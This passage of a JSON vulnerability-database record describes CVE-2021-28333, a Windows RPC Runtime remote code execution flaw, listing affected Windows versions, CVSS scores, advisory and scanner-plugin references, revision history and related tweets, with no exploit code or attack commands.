{"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28333"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-20T09:36:35", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28333"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-20T09:36:35", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 25, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371813998596", "text": " NEW: CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/fEwWVr44Rb?amp=1"}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/threatintelctr/status/1384220371822419992", "text": " NEW: CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/2ogBljwZsG?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371679809544", "text": " NEW: CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/ZiHFI8SGR7?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371650453516", "text": " NEW: CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Aw1lXDpd8E?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371746914307", "text": " NEW: CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/oeqb8wsiKw?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333"}], "hash": "e4bcd708a19e00acaf4eccafdc85472608501680253f6a36fd7c2259879cab58", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "805069528e2d32bbcd8ccc432e1dcf51", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "1042ee34062f5083d6531c78b29d8752", "key": "extraReferences"}, {"hash": "9f37470c8d14702defe53735b64042c7", "key": "href"}, {"hash": "c8ed5bb3d0e20223fc19510b199ee374", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "f56e83700de50704c7da559bcecd492e", "key": "title"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "323807eb41d846cb6ba75af97a474391", "key": "cvelist"}, {"hash": "d9350890cd680da362af203c5f22bcc7", "key": "modified"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28333", "id": "CVE-2021-28333", "immutableFields": [], "lastseen": "2021-04-20T09:36:35", "modified": "2021-04-19T20:00:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333"], "reporter": "cve@mitre.org", "title": "CVE-2021-28333", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-20T09:36:35"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28333"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28333"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 25, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371813998596", "text": " NEW: CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/fEwWVr44Rb?amp=1"}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/threatintelctr/status/1384220371822419992", "text": " NEW: CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/2ogBljwZsG?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371679809544", "text": " NEW: CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/ZiHFI8SGR7?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371650453516", "text": " NEW: CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Aw1lXDpd8E?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371746914307", "text": " NEW: CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/oeqb8wsiKw?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333"}], "hash": "bc7f70f596efa6a2a11e805a953810d30e371d72cfb2b7fad5af81517b79a47f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "805069528e2d32bbcd8ccc432e1dcf51", "key": "references"}, {"hash": "7ab9cd4f24ddb02a9bc79858aa65f4da", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "9f37470c8d14702defe53735b64042c7", "key": "href"}, {"hash": "c8ed5bb3d0e20223fc19510b199ee374", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f56e83700de50704c7da559bcecd492e", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "323807eb41d846cb6ba75af97a474391", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28333", "id": "CVE-2021-28333", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333"], "reporter": "cve@mitre.org", "title": "CVE-2021-28333", "type": "cve", "viewCount": 1}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "323807eb41d846cb6ba75af97a474391"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "c8ed5bb3d0e20223fc19510b199ee374"}, {"key": "extraReferences", "hash": "1042ee34062f5083d6531c78b29d8752"}, {"key": "href", "hash": "9f37470c8d14702defe53735b64042c7"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d9350890cd680da362af203c5f22bcc7"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "805069528e2d32bbcd8ccc432e1dcf51"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "f56e83700de50704c7da559bcecd492e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c9fd339282deccaa39a11dccb7e1af18cbec0065f48ad3863e01b00e57250b9c", "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28333"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001339.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 25, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371813998596", "text": " NEW: CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/fEwWVr44Rb?amp=1"}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/threatintelctr/status/1384220371822419992", "text": " NEW: CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/2ogBljwZsG?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371679809544", "text": " NEW: CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/ZiHFI8SGR7?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371650453516", "text": " NEW: CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Aw1lXDpd8E?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371746914307", "text": " NEW: CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/oeqb8wsiKw?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": 